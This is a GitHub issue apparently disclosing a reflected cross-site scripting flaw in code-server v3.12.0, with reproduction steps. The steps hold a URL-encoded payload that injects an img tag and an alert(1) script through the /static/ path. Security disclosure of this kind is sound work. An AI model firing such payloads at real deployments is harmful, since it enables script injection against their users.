Skip to content

Cross Site Scripting(XSS)vulnerability in code-server #4355

Closed
@Jyhtpy

Description

@Jyhtpy

OS/Web Information

  • Web Browser: firefox
  • Local OS: Debian
  • Remote OS:Debian
  • Remote Architecture:
  • code-server --version: v3.12.0

Steps to Reproduce

1.Open your browser and insert payload /static/test%3Cmy_tag_efb4535077ba29aaca28167c491b4249/%3E%3Cimg%20src=x%3E%3Cscript%3Ealert(1)%3C/script%3E

2.example: http://127.0.0.1:8080/static/test%3Cmy_tag_efb4535077ba29aaca28167c491b4249/%3E%3Cimg%20src=x%3E%3Cscript%3Ealert(1)%3C/script%3E

Screenshot

image

Notes

This issue can be reproduced in VS Code: Yes

Metadata

Metadata

Assignees

No one assigned

    Labels

    securitySecurity related

    Type

    No type

    Projects

    No projects

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions